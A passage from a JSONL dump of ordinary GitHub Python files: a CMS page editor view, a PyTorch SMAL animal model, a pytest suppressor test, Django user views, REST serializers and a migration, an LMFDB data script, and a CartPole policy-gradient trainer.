\")\n\n\nclass PageEdit(EditView):\n\n pass\n\n\nclass PageLayout(PageView):\n\n \"\"\" Edit view for page \"\"\"\n\n @property\n def is_edit(self):\n\n return True\n\n @property\n def raw_content(self):\n\n return self.context._content\n\n def save(self):\n\n \"\"\" Parse html, and extract blocks. \"\"\"\n\n parser = Parser(self.context)\n\n self.context.clear_blocks()\n\n parser.parse(self.request.params.get('content', \"\"))\n\n self.context._p_changed = True\n\n self.context._content = self.request.params.get('content', \"\")\n\n return {}\n\n def save_block(self):\n\n \"\"\" but not really... we only create the proper html \"\"\"\n\n clazz = Registry.get_type(self.request.params.get('type'))\n\n if not clazz:\n return {'html': ''}\n\n block = clazz(self.request.params.get(\"id\"), **self.request.params)\n\n if block['type'] == \"image\":\n\n if self.request.params.get('mode') == 'add':\n\n img_id = self.context.generate_content_id(\n self.request.params.get('img').filename)\n\n img = Image(img_id,\n {'name': img_id,\n 'data': {\n 'name': self.request.params.get('img').filename,\n 'data': self.request.params.get('img').value\n }\n })\n\n self.context.add_content(img)\n\n block['img_url'] = '%s%s' % (self.url, img_id)\n\n self.request.is_edit = True\n\n return \"%s\" % render_view(block, self.request)\n\n self.request.is_edit = True\n\n return render_view(block, self.request)\n\n def add_form(self):\n\n \"\"\" show add form for given type \"\"\"\n\n typp = self.request.params.get('type')\n clazz = Registry.get_type(typp)\n\n if not clazz:\n return {'html': '
No form found
'}\n\n tpl = PageTemplate(clazz.add_form)\n\n form = tpl(data={\n 'id': generate_id(prefix=\"%s_\" % typp, length=10)})\n\n return {'html': form}\n\n def edit_form(self):\n\n \"\"\" Show edit form for given block type \"\"\"\n\n clazz = Registry.get_type(self.request.params.get('type'))\n\n if not clazz:\n return {'html': '
No form found
'}\n\n tpl = PageTemplate(clazz.edit_form)\n\n data = self._params_to_dict(self.request.params)\n data['mode'] = 'edit'\n\n form = tpl(data=data)\n\n return {'html': form}\n\n def get_block(self, block_id):\n\n return self.context.get_block_by_ref(block_id)\n\n def page_actions(self):\n\n layoutsubs = [\n {'id': 'grid',\n 'title': 'Grid',\n 'action': 'javascript: pycms.selectLayout(\"grid\")',\n 'permission': 'edit'\n },\n {'id': '2col',\n 'title': '2 columns',\n 'action': 'javascript: pycms.selectLayout(\"2col\")',\n 'permission': 'edit'\n },\n {'id': '3col',\n 'title': '3 columns',\n 'action': 'javascript: pycms.selectLayout(\"3col\")',\n 'permission': 'edit'\n },\n {'id': '4col',\n 'title': '4 columns',\n 'action': 'javascript: pycms.selectLayout(\"4col\")',\n 'permission': 'edit'\n },\n ]\n\n subs = []\n\n for tp in Registry.list_types():\n\n subs.append({'id': 'add_%s' % tp,\n 'title': '%s' % tp,\n 'action': 'javascript: pycms.addBlock(\"%s\")' % tp,\n 'permission': 'edit'\n })\n\n return [\n {'id': 'pick_layout',\n 'title': 'Select layout...',\n 'action': '',\n 'permission': 'edit',\n 'subs': layoutsubs\n },\n {'id': 'add_block',\n 'title': 'Add block...',\n 'action': '',\n 'permission': 'edit',\n 'subs': subs\n },\n {'id': 'delete',\n 'title': 'Delete',\n 'action': 'javascript: pycms.deleteBlock()',\n 'permission': 'edit'\n },\n {'id': 'edit',\n 'title': 'Edit',\n 'action': 'javascript: pycms.editBlock()',\n 'permission': 'edit'\n },\n {'id': 'cut',\n 'title': 'Cut',\n 'action': 'javascript: pycms.cutBlock()',\n 'permission': 'edit'\n },\n {'id': 'paste',\n 'title': 'Paste',\n 'action': 'javascript: pycms.pasteBlock()',\n 'permission': 'edit'\n },\n {'id': 'save',\n 'title': 'Save',\n 'action': 'javascript: pycms.savePage()',\n 'permission': 'edit'\n },\n ]\n\n def _params_to_dict(self, params):\n\n \"\"\" create simple dict from multidict \"\"\"\n\n simple = {}\n\n for key in list(params.keys()):\n\n simple[key] = params.get(key)\n\n return simple\n","repo_name":"wyldebeast-wunderliebe/w20e.pycms","sub_path":"w20e/pycms/views/page.py","file_name":"page.py","file_ext":"py","file_size_in_byte":7240,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"36"}
+{"seq_id":"20029746349","text":"\"\"\"\n\n PyTorch implementation of the SMAL/SMPL model\n\n\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport torch\nfrom torch.autograd import Variable\nimport pickle as pkl \nfrom .batch_lbs import batch_rodrigues, batch_global_rigid_transformation\nfrom .smal_basics import align_smal_template_to_symmetry_axis, get_smal_template\nimport torch.nn as nn\nimport config\n\n# There are chumpy variables so convert them to numpy.\ndef undo_chumpy(x):\n return x if isinstance(x, np.ndarray) else x.r\n\n\n'''\nJ_regressor_prior: 关节回归矩阵的先验\nJ_regressor: 关节回归矩阵\nf: 面(3个点的索引)\nkintree_table: 关节树表\nJ: 关节位置\nweight_prior: 蒙皮权重先验\nweight: 蒙皮权重\nvert_sym_idxs: 顶点索引\nposedirs: 姿态矫正\nbs_type: 姿态矫正蒙皮方式(lrotmin)\nv_template: T pose顶点信息(基础模型)\nshapedirs: 形状矫正 \nbs_style: 形状矫正蒙皮方式(lbs)\n'''\n\n\ndef caclulate_bone_lengths_from_J(J, parents):\n # NEW: calculate bone lengths:\n all_bone_lengths_list = []\n for i in range(1, parents.shape[0]):\n bone_vec = J[:, i] - J[:, parents[i]]\n bone_length = torch.sqrt(torch.sum(bone_vec ** 2, axis=1)) # 一个bs中骨架一对关节点的距离\n all_bone_lengths_list.append(bone_length)\n all_bone_lengths = torch.stack(all_bone_lengths_list)\n\n return all_bone_lengths # .permute((1,0))\n\nclass SMAL(nn.Module):\n def __init__(self, device, shape_family_id=-1, dtype=torch.float):\n super(SMAL, self).__init__()\n\n # -- Load SMPL params --\n # with open(pkl_path, 'r') as f:\n # dd = pkl.load(f)\n \n with open(config.SMAL_FILE, 'rb') as f:\n u = pkl._Unpickler(f)\n u.encoding = 'latin1'\n dd = u.load()\n\n self.f = dd['f']\n '''(7774,3)三角网格数量'''\n self.faces = torch.from_numpy(self.f.astype(int)).to(device)\n\n # replaced logic in here (which requried SMPL library with L58-L68)\n '''(3889,3)基础模型'''\n v_template = get_smal_template(\n model_name=config.SMAL_FILE,\n data_name=config.SMAL_DATA_FILE,\n shape_family_id=-1)\n\n v_sym, self.left_inds, self.right_inds, self.center_inds = \\\n align_smal_template_to_symmetry_axis(v_template, sym_file=config.SMAL_SYM_FILE)\n # Mean template vertices\n self.v_template = Variable(torch.Tensor(v_sym),requires_grad=False).to(device)\n\n # Size of mesh [Number of vertices, 3]\n self.size = [v_template.shape[0], 3]\n '''(3889,3,41) >> 41'''\n self.num_betas = dd['shapedirs'].shape[-1]\n # Shape blend shape basis\n '''(41,11667)'''\n shapedir = np.reshape(\n undo_chumpy(dd['shapedirs']), [-1, self.num_betas]).T.copy()\n\n self.shapedirs = Variable(\n torch.Tensor(shapedir), requires_grad=False).to(device)\n\n # if shape_family_id != -1:\n # with open(config.SMAL_DATA_FILE, 'rb') as f:\n # u = pkl._Unpickler(f)\n # u.encoding = 'latin1'\n # data = u.load()\n # # Select mean shape for quadruped type\n # '''(5,41) >> (41,) 指定基礎動物模型'''\n # # betas = data['cluster_means'][shape_family_id]#类别模型\n # betas = np.zeros_like(data['cluster_means'][shape_family_id])\n # '''(3889,3)'''\n # v_template = v_template + np.matmul(betas[None,:], shapedir).reshape(\n # -1, self.size[0], self.size[1])[0]\n\n # (35,3889)\n # Regressor for joint locations given shape \n # self.J_regressor = Variable(\n # torch.Tensor(dd['J_regressor'].T.todense()),\n # requires_grad=False).to(device)\n\n self.J_regressor = Variable(\n torch.Tensor(dd['J_regressor'].T), requires_grad=False).to(device)###\n\n\n # Pose blend shape basis =306\n num_pose_basis = dd['posedirs'].shape[-1]\n \n posedirs = np.reshape(\n undo_chumpy(dd['posedirs']), [-1, num_pose_basis]).T\n self.posedirs = Variable(\n torch.Tensor(posedirs), requires_grad=False).to(device)\n # (2,35)\n # indices of parents for each joints\n self.parents = dd['kintree_table'][0].astype(np.int32)\n self.kintree_table = dd['kintree_table']\n\n # LBS weights\n self.weights = Variable(\n torch.Tensor(undo_chumpy(dd['weights'])),\n requires_grad=False).to(device)\n\n\n def __call__(self, beta, theta, trans=None, del_v=None, betas_logscale=None, get_skin=True, v_template=None):\n\n if True:\n nBetas = beta.shape[1]\n else:\n nBetas = 0\n\n # print(\"\\ntheta: \",theta)\n\n \n # v_template = self.v_template.unsqueeze(0).expand(beta.shape[0], 3889, 3)\n if v_template is None:\n v_template = self.v_template\n\n # 1. Add shape blend shapes\n \n if nBetas > 0:#20\n if del_v is None:\n # print(\"\\nbeta: \", beta)\n v_shaped = v_template + torch.reshape(torch.matmul(beta, self.shapedirs[:nBetas,:]), [-1, self.size[0], self.size[1]])\n else:\n v_shaped = v_template + del_v + torch.reshape(torch.matmul(beta, self.shapedirs[:nBetas,:]), [-1, self.size[0], self.size[1]])\n else:\n if del_v is None:\n v_shaped = v_template.unsqueeze(0)\n else:\n v_shaped = v_template + del_v \n '''3889个顶点转为35个关节点'''\n # 2. Infer shape-dependent joint locations.\n Jx = torch.matmul(v_shaped[:, :, 0], self.J_regressor)\n Jy = torch.matmul(v_shaped[:, :, 1], self.J_regressor)\n Jz = torch.matmul(v_shaped[:, :, 2], self.J_regressor)\n #(1,35,3)\n J = torch.stack([Jx, Jy, Jz], dim=2)\n\n # all_bone_length = caclulate_bone_lengths_from_J(J,self.parents)\n # print(all_bone_length.shape, all_bone_length)\n # np.savetxt(\"/media/scau2311/A/xcg/barc_release/data/pig_smal_data/mean_pig_bone_lengths.txt\",\n # all_bone_length, fmt=\"%.18f\")\n\n # 3. Add pose blend shapes\n # N x 24 x 3 x 3\n if len(theta.shape) == 4:\n Rs = theta\n else:# N x 35 x 3 x 3 用3x3的旋转矩阵表示的关节点的全局旋转矩阵\n # theta[0,0] = torch.zeros(1, 3)\n Rs = torch.reshape(batch_rodrigues(torch.reshape(theta, [-1, 3])), [-1, 35, 3, 3])\n \n # Ignore global rotation.\n # (1,306) 当前姿态和306个静止姿态的相对旋转值 34X9\n pose_feature = torch.reshape(Rs[:, 1:, :, :] - torch.eye(3).to(beta.device), [-1, 306])\n # print(pose_feature)\n #(1,3889,3)\n v_posed = torch.reshape(\n torch.matmul(pose_feature, self.posedirs),#混合变形计算\n [-1, self.size[0], self.size[1]]) + v_shaped\n #J_transformed=(1,35,3)3元素?\n #A=(1,35,4,4)\n #4. Get the global joint location 以0号节点为根节点,其他节点先对其的旋转角度,表示模型的全局旋转\n self.J_transformed, A = batch_global_rigid_transformation(\n Rs, J, self.parents)#, betas_logscale=betas_logscale\n\n\n # 5. Do skinning:\n num_batch = theta.shape[0]\n #(3889,35)蒙皮权重\n weights_t = self.weights.repeat([num_batch, 1])\n W = torch.reshape(weights_t, [num_batch, -1, 35])\n\n #(1,3889,4,4)\n T = torch.reshape(\n torch.matmul(W, torch.reshape(A, [num_batch, 35, 16])), [num_batch, -1, 4, 4])\n #(1,3889,4)加1列全为1\n v_posed_homo = torch.cat(\n [v_posed, torch.ones([num_batch, v_posed.shape[1], 1]).to(device=beta.device)], 2)\n #(1,3889,4,1)\n v_homo = torch.matmul(T, v_posed_homo.unsqueeze(-1))\n\n verts = v_homo[:, :, :3, 0]\n\n if trans is None:\n trans = torch.zeros((num_batch,3)).to(device=beta.device)\n\n verts = verts + trans[:, None, :]\n # print(\"tran: \",trans)\n\n # Get joints:变换后的关节位置\n # joint_x = torch.matmul(verts[:, :, 0], self.J_regressor)\n # joint_y = torch.matmul(verts[:, :, 1], self.J_regressor)\n # joint_z = torch.matmul(verts[:, :, 2], self.J_regressor)\n # joints = torch.stack([joint_x, joint_y, joint_z], dim=2)\n joints = self.J_transformed\n\n joints = torch.cat([\n joints,\n verts[:, None, 257], # 35 nose\n verts[:, None, 237], # 36 chin\n verts[:, None, 3700], # 37 left ear tip\n verts[:, None, 1820], # 38 right ear tip\n verts[:, None, 3816], # 39 left eye\n verts[:, None, 1936], # 40 right eye\n verts[:, None, 321], # 41 throat\n ], dim = 1) \n\n # import matplotlib.pyplot as plt\n # plt.ion()\n # plt.figure(figsize=[10, 8])\n # ax = plt.axes(projection=\"3d\")\n # joints_x, joints_y, joints_z = joints.cpu()[0][:, 0].detach().numpy(), joints.cpu()[0][:, 1].detach().numpy(), joints.cpu()[0][:,2].detach().numpy()\n # verts_x, verts_y, verts_z = v_template[:, 0].cpu().detach().numpy(), v_template[:, 1].cpu().detach().numpy(),v_template[:, 2].cpu().detach().numpy()\n #\n # # ax.scatter3D(joints_x, joints_y, joints_z, s=50, c='red', label='3d')\n # ax.scatter3D(verts_x, verts_y, verts_z, s=10, c='blue', label='3d',alpha=0.5)\n # for i, j in enumerate(config.PIG_MODEL_JOINTS_NAME):\n # ax.text3D(joints.cpu()[0][i][0].detach().numpy(), joints.cpu()[0][i][1].detach().numpy(),\n # joints.cpu()[0][i][2].detach().numpy(), j)\n # # ax.scatter3D(proj_points[0][:, 0].detach().numpy(), proj_points[0][:, 1].detach().numpy(),\n # # np.zeros_like(proj_points[0][:,0].detach().numpy()), s=50, c='blue', label='2d')\n # ax.legend()\n # # kintree_table = [[6, 7], [7, 8], [8, 11], [9, 10], [10, 11], [3, 4], [4, 5], [3, 4],\n # # [0, 1], [1, 2], [2, 5], [2, 8], [2, 15],\n # # [8, 16], [15, 19], [16, 20],\n # # [16, 22], [15, 21], [21, 17], [22, 17], [18, 17],\n # # [11, 12], [5, 12], [12, 13], [13, 14]]\n # for i in self.kintree_table.T:\n # if i[0] > 35:\n # i=[0,0]\n # x1, y1, z1 = [], [], []\n # x2, y2, z2 = [], [], []\n # for j in i: # 两个点相连\n # x1.append(float(joints_x[j]))\n # y1.append(float(joints_y[j]))\n # z1.append(float(joints_z[j]))\n # x2.append(float(Jx[0][j]))\n # y2.append(float(Jy[0][j]))\n # z2.append(float(Jz[0][j]))\n # ax.plot3D(x1, y1, z1, color='red', marker='o', linestyle='dashed', linewidth=2, markersize=10,\n # label=\"first\")\n # # ax.plot3D(x2, y2, z2, color='red', marker='o', linestyle='dashed', linewidth=2, markersize=10, label=\"second\")\n # ax.text3D(x1[0], y1[0], z1[0], \"3d\", fontsize=10)\n # # ax.text3D(x2[0], y2[0], z2[0], \"second\", fontsize=10)\n # # plt.savefig(rf\"E:\\DL\\SMALify\\outputs\\pigs\\vis_joints\\{time.time()}.png\")\n # # plt.close('all')\n # plt.xlabel('X')\n # plt.ylabel('Y') # y 轴名称旋转 38 度\n # ax.set_zlabel('Z', rotation=90) # 因为 plt 不能设置 z 轴坐标轴名称,所以这里只能用 ax 轴来设置(当然,x 轴和 y 轴的坐标轴名称也可以用 ax 设置)\n # import time\n # time0 = time.time()\n # # plt.savefig(f\"/media/scau2311/A/xcg/SMALify/outputs/pigs/000000054901/vis_results/3d_joint_{time0}.jpg\")\n # plt.pause(10)\n # plt.show()\n\n if get_skin:\n return verts, joints, Rs, v_shaped##\n else:\n return joints\n","repo_name":"G-Apple1/SMALify-Pig3D","sub_path":"smal_model/smal_torch.py","file_name":"smal_torch.py","file_ext":"py","file_size_in_byte":12034,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"22529547208","text":"from __future__ import absolute_import\nfrom typing import Tuple\nimport os\nimport json\n\nimport pytest\nimport pandas as pd\nimport numpy as np\nfrom pathlib import Path\n\nfrom castor.detector.suppressor.suppressor import SuppressorPipeline\nfrom castor.utils import logger as llogger\nfrom castor.utils import const as con\nfrom castor.detector.cache.cache import CacheSet\nfrom castor.detector.cache.organize_cache import clear_cache\n\npd.set_option(\"display.max_rows\", None)\npd.set_option(\"display.max_columns\", None)\n\nCURRENT_PATH = os.path.dirname(os.path.abspath(__file__))\nTESTS_PATH = os.path.split(CURRENT_PATH)[0]\nCONF_PATH = os.path.join(\n Path(__file__).parents[2], \"demo\", \"demo_conf\", \"detect_base.yaml\"\n)\nDATA_PATH = os.path.join(TESTS_PATH, \"data\")\nwith open(os.path.join(TESTS_PATH, \"conf\", \"test.json\")) as f:\n tests_params = json.load(f)\nllogger.basic_config(level=\"DEBUG\")\n\nsuppress_module = [\"transient\", \"continuous\"]\nif_anomaly = [True, False]\n\nparams = {\n \"transient\": {\n \"cache_length\": 30,\n \"TransientAnomalySuppressor\": {con.WINDOW: 5, \"anomalies\": 3},\n },\n \"continuous\": {\n \"cache_length\": 30,\n \"ContinuousAnomalySuppressor\": {con.GAP: \"10D\"},\n },\n}\n\nresult = {\"transient\": {True: 1, False: 0}, \"continuous\": {True: 1, False: 0}}\n\n\ndef pandas_wrap(data: np.ndarray, data_type: str):\n if data_type == \"detect_result\":\n return pd.DataFrame(\n data,\n index=pd.date_range(start=\"2021-01-02\", periods=len(data), freq=\"1D\"),\n columns=[\"lacolumn\"],\n )\n elif data_type == \"ori_data\":\n return pd.DataFrame(\n data,\n index=pd.date_range(start=\"2021-01-02\", periods=len(data), freq=\"1D\"),\n columns=[\"lacolumn\"],\n )\n else:\n return None\n\n\ndef data_generation(\n module: str, status: bool, length: int\n) -> Tuple[pd.DataFrame, pd.DataFrame]:\n label = np.array([False] * length).reshape(-1, 1)\n ori_data = np.ones((length, 1))\n if module == \"transient\":\n label[50:60, 0] = True\n if status:\n label[62, 0] = True\n else:\n label[63, 0] = True\n elif module == \"continuous\":\n label[58, 0] = True\n if status:\n label[70, 0] = True\n else:\n label[63, 0] = True\n\n return pandas_wrap(ori_data, data_type=\"ori_data\"), pandas_wrap(\n label, data_type=\"detect_result\"\n )\n\n\n@pytest.mark.usefixtures(\"env_ready\")\nclass TestSuppressor:\n @pytest.fixture()\n def env_ready(self):\n self.tear_up()\n yield\n self.tear_down()\n\n def tear_up(self):\n pass\n\n def tear_down(self):\n clear_cache()\n\n @pytest.mark.parametrize(\"module\", suppress_module)\n @pytest.mark.parametrize(\"if_anomaly_bool\", if_anomaly)\n def test_suppress(self, module, if_anomaly_bool):\n suppressor_name = {\n \"transient\": \"TransientAnomalySuppressor\",\n \"continuous\": \"ContinuousAnomalySuppressor\",\n }\n cache_length = {\"transient\": 1, \"continuous\": 1}\n cache = CacheSet().get_cache(con.SUPPRESS_CACHE)\n data, detect_results = data_generation(module, if_anomaly_bool, 100)\n suppressor = SuppressorPipeline(name=\"Gemini\", params=params.get(module))\n _ = suppressor.suppress(\n {con.LABEL: detect_results.iloc[:30, :], con.ORIGIN: data.iloc[:30, :]}\n )\n _ = suppressor.suppress(\n {con.LABEL: detect_results.iloc[30:60, :], con.ORIGIN: data.iloc[30:60, :]}\n )\n print(f'result: {\"Gemini\" + suppressor_name.get(module) + \"lacolumn\"}')\n\n cache_result = [col for col in cache.keys() if str(col).startswith(\"Gemini\")]\n assert len(cache_result) == cache_length.get(module)\n detect_results = suppressor.suppress(\n {con.LABEL: detect_results.iloc[60:, :], con.ORIGIN: data.iloc[60:, :]}\n )\n print(f\"detect_result: {detect_results}\")\n print(f\"SuppressCache: {CacheSet().get_cache(con.SUPPRESS_CACHE)._cache}\")\n assert sum(detect_results.get(con.LABEL).iloc[:, 0]) == result.get(module).get(\n if_anomaly_bool\n )\n","repo_name":"openGemini/openGemini-castor","sub_path":"tests/suppressor/test_suppressor_cache.py","file_name":"test_suppressor_cache.py","file_ext":"py","file_size_in_byte":4159,"program_lang":"python","lang":"en","doc_type":"code","stars":15,"dataset":"github-code","pt":"36"}
+{"seq_id":"38915897410","text":"from django.contrib.auth.decorators import login_required\nfrom django.shortcuts import render, redirect\nfrom .forms import UserCreationForm,editarperrfilform\n\ndef registro(request):\n if request.method == 'POST':\n form = UserCreationForm(request.POST)\n if form.is_valid():\n form.save()\n return redirect('shop:product_list')\n else:\n form = UserCreationForm()\n return render(request,'registration/registro.html',{'form':form})\n\n@login_required\ndef editarperfil(request):\n user = request.user\n if request.method == 'POST':\n form = editarperrfilform(request.POST, instance=user)\n if form.is_valid():\n form.save()\n return redirect('shop:product_list')\n else:\n form = editarperrfilform(instance=user)\n return render(request, 'registration/editar_perfil.html', {'form': form})\n","repo_name":"zk-error/myshop","sub_path":"cuentas/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":876,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"20885255117","text":"import sys, json, re, os\nHOME=os.path.expanduser(\"~\")\nsys.path.append(os.path.join(HOME, 'lmfdb'))\n\nfh=open(\"grdata.out\")\nfrom lmfdb import db\n\nadict = {}\n\nadictaut = {}\n\nfor fn in [\"grdata.out\", \"grdata_aut.out\"]:\n print (\"Reading \"+fn)\n fh=open(fn)\n for line in fh.readlines():\n line.strip()\n if re.match(r'\\S', line):\n line = line.replace(r\"'\", r'\"')\n l = json.loads(line)\n ambient = l[0]\n final=l[1]\n for a in final:\n full_label = \"%s.%s\"%(ambient, a[0])\n if fn == \"grdata.out\":\n adict[full_label] = int(round(a[1]))\n else:\n adictaut[full_label] = int(round(a[1]))\n #print ({'label': '%s.%s'%(lab, a[0])}, {'diagram_x': a[1]})\n #db.gps_subgroups.upsert({'label': '%s'%(a[0])}, {'diagram_x': int(round(a[1]))})\n fh.close()\n\n\n#for a in final:\n# db.gps_subgroups.upsert({'label': '%s.%s'%(gp, a[0])}, {'diagram_x': a[1]})\n\ndef modif(ent):\n global adict\n lab = ent['label']\n if lab in adict:\n ent['diagram_x'] = adict[lab]\n if lab in adictaut:\n ent['diagram_aut_x'] = adictaut[lab]\n return ent\n\ndb.gps_subgroups.rewrite(modif)\n\n","repo_name":"roed314/FiniteGroups","sub_path":"Code/LMFDB/grfinish.py","file_name":"grfinish.py","file_ext":"py","file_size_in_byte":1188,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"36"}
+{"seq_id":"13271035173","text":"from rest_framework import serializers\nfrom snippets.models import Snippet, CourseList, CoursePage\nfrom django.contrib.auth.models import User, Group\nfrom django.core.mail import send_mail\nfrom tutorial.settings import BASE_URL\nfrom utils.token_generator import token_generator, create_email_confirm_url\n\n# class SnippetSerializer(serializers.ModelSerializer):\nclass SnippetSerializer(serializers.HyperlinkedModelSerializer):\n # highlight = serializers.HyperlinkedIdentityField(view_name='snippet-highlight', format='html')\n class Meta:\n model = Snippet\n # fields = ('id', 'title', 'code', 'linenos', 'language', 'style', 'owner')\n fields = ('url', 'id', 'title', 'owner')\n\n\nclass CreateSnippetSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n # highlight = serializers.HyperlinkedIdentityField(view_name='snippet-highlight', format='html')\n\n class Meta:\n model = Snippet\n fields = (\n 'url', 'id', 'title', 'code', 'linenos', 'language',\n 'style', 'owner', 'perm_list'\n )\n\n\n# class UserSerializer(serializers.ModelSerializer):\nclass UserSerializer(serializers.HyperlinkedModelSerializer):\n # snippets = serializers.PrimaryKeyRelatedField(many=True, queryset=Snippet.objects.all())\n snippets = serializers.HyperlinkedRelatedField(\n many=True, view_name='snippet-detail',\n read_only=True\n )\n\n class Meta:\n model = User\n fields = ('id', 'username', 'snippets')\n\n\nclass UserCreateSerializer(serializers.ModelSerializer):\n password = serializers.CharField(write_only=True)\n\n def create(self, validated_data):\n user = User.objects.create(\n username=validated_data['username'],\n is_active = False,\n email = validated_data['email']\n )\n print('SOMEPRINT',validated_data)\n print('SOMEPRINT')\n token = token_generator.make_token(user)\n url = create_email_confirm_url(user.id, token)\n print('SOMEPRINT', url)\n # ~ send_mail(\n # ~ 'Activation on Django', url, 'djangodev108@gmail.com',\n # ~ [validated_data['email']], fail_silently=False\n # ~ )\n user.set_password(validated_data['password'])\n user.groups.add(1)\n user.save()\n if User.objects.filter(username=self.validated_data['username']).exists():\n send_mail(\n 'Activation on Django', url, 'djangodev108@gmail.com',\n [validated_data['email']], fail_silently=False\n )\n else:\n print('SOMEPRINT wrong')\n return user\n\n class Meta:\n model = User\n fields = (\n 'id', 'username', 'password', 'email', 'first_name',\n 'last_name',\n )\n\n\nclass CreateCourseSerializer(serializers.ModelSerializer):\n owner = serializers.ReadOnlyField(source='owner.username')\n\n class Meta:\n model = CourseList\n fields = ('title', 'descrpt', 'owner')\n\n\nclass CreateCoursePageSerializer(serializers.ModelSerializer):\n class Meta:\n model = CoursePage\n fields = ('course', 'snippet', 'order', 'dtm')\n\n\nclass CourseListSerializer(serializers.HyperlinkedModelSerializer):\n class Meta:\n model = CourseList\n fields = ('url', 'id', 'title', 'descrpt', 'owner')\n\n\nclass CoursePageSerializer(serializers.HyperlinkedModelSerializer):\n # snippet = serializers.HyperlinkedRelatedField(many=False, view_name='snippet-detail', read_only=True)\n title = serializers.ReadOnlyField(source='snippet.title')\n class Meta:\n model = CoursePage\n fields = ('order', 'title', 'dtm','snippet')\n\n\nclass CourseDetailSerializer(serializers.HyperlinkedModelSerializer):\n # pages = serializers.StringRelatedField(many=True)\n # pages_listing = serializers.HyperlinkedIdentityField(view_name='coursepage-list')\n pages = CoursePageSerializer(many=True, read_only=True)\n # ~ pages = serializers.HyperlinkedRelatedField(\n # ~ many=True,\n # ~ view_name='coursepage-detail',\n # ~ read_only=True\n # ~ )\n\n class Meta:\n model = CourseList\n fields = ('title', 'descrpt', 'pages')\n\n\nclass CourseDetailPageSerializer(serializers.HyperlinkedModelSerializer):\n # pages = serializers.HyperlinkedRelatedField(many=True, view_name='snippet-detail', read_only=True)\n title = serializers.ReadOnlyField(source='snippet.title')\n\n class Meta:\n model = CoursePage\nfields = ('title', 'order', 'dtm', 'snippet')\n","repo_name":"Serq108/DZ10","sub_path":"snippets/serializers.py","file_name":"serializers.py","file_ext":"py","file_size_in_byte":4554,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"28072424022","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\nimport django.utils.timezone\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('lesson', '0001_initial'),\n ('word', '0001_initial'),\n ]\n\n operations = [\n migrations.CreateModel(\n name='Answer',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ],\n ),\n migrations.CreateModel(\n name='Exam',\n fields=[\n ('id', models.AutoField(primary_key=True, verbose_name='ID', auto_created=True, serialize=False)),\n ('date', models.DateTimeField(default=django.utils.timezone.now)),\n ('lesson_user', models.ForeignKey(related_name='exam', to='lesson.LessonUser')),\n ],\n ),\n migrations.AddField(\n model_name='answer',\n name='exam',\n field=models.ForeignKey(related_name='answer', to='exam.Exam'),\n ),\n migrations.AddField(\n model_name='answer',\n name='question',\n field=models.ForeignKey(related_name='answers', to='word.Question'),\n ),\n ]\n","repo_name":"huyquyet/projectLearn","sub_path":"exam/migrations/0001_initial.py","file_name":"0001_initial.py","file_ext":"py","file_size_in_byte":1277,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
+{"seq_id":"35815255363","text":"import torch\nimport math\nfrom torch.utils.tensorboard import SummaryWriter\n\nfrom agents.policy_gradient import PGAgent\nimport gymnasium as gym\n\ndef visualize_in_gym(agent, env_name = \"\", inp_env = None, steps=100):\n \"\"\"\n render a environment and visualize it running N steps\n\n another possible solution can be gymnasium.experimental.wrappers.RecordVideoV0\n\n or gymnasium.utils.save_video.save_video?\n \"\"\"\n if inp_env:\n demo_env = inp_env\n else:\n demo_env = gym.make(env_name, render_mode = \"human\")\n observation, info = demo_env.reset()\n\n for _ in range(steps):\n action = agent.get_action(torch.from_numpy(observation)) # agent policy that uses the observation and info\n # insert an algorithm that can interact with env and output an action here\n observation, reward, terminated, truncated, _ = demo_env.step(action)\n if terminated or truncated:\n observation, info = demo_env.reset()\n\n if not inp_env:\n demo_env.close()\n\nenv = gym.make(\"CartPole-v1\")\n\nagent = PGAgent(4, 2)\n\ndemo_env = gym.make(\"CartPole-v1\", render_mode = \"human\")\n# gym.utils.play.play(demo_env, fps=128)\n\nwriter = SummaryWriter()\n\nDISCOUNTED_FACTOR = 0.9\n\nnum_episodes = 2000\nfor episode in range(num_episodes):\n episode_recorder = []\n observation, info = env.reset()\n done = False\n episode_reward = 0\n while not done:\n action = agent.get_action(torch.from_numpy(observation))\n next_observation, reward, terminated, truncated, _ = env.step(action)\n episode_recorder.append((observation, action, reward, next_observation))\n observation = next_observation\n done = terminated or truncated\n episode_reward += reward\n\n # for observation, action, reward, next_observation in reversed(episode_recorder):\n loss = agent.update(episode_recorder, DISCOUNTED_FACTOR)\n\n writer.add_scalar('Loss', loss, episode)\n writer.add_scalar('Reward', episode_reward, episode)\n if episode % 100 == 0:\n visualize_in_gym(agent, inp_env=demo_env)\n # visualize_in_gym(agent, env_name=\"CartPole-v1\")\n\n\nwriter.flush()\nwriter.close()\n\n\nvisualize_in_gym(agent, inp_env=demo_env)","repo_name":"zhilu1/rl_practice","sub_path":"cart_pole_PG.py","file_name":"cart_pole_PG.py","file_ext":"py","file_size_in_byte":2193,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"36"}
